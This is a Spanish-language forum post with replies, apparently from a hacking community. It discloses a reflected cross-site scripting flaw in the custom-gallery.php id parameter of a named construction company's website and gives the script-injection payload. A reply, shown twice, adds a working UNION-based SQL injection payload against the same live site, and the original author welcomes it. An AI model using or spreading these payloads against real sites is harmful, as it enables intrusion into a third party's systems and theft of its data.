[XSS] Dynasty Builders - http://www.dynastybuilders.ca/

    Captura de pantalla


    Url del sitio

• You are not allowed to view links. Register or Login

    Vector

• Archivo y Parametro: custom-gallery.php?id=
• Payload XSS: '"><script>alert(/Drok3r - XSS /)</script>
• PoC:

----> You are not allowed to view links. Register or Login

    Autor
[!] Drok3r (redbirdTEAM - CiberSecurityRECON)

    Reportado: SI

¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: You are not allowed to view links. Register or Login' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!

¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: You are not allowed to view links. Register or Login' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!

Aaaa que cosas.... jeje Gracias por el dato.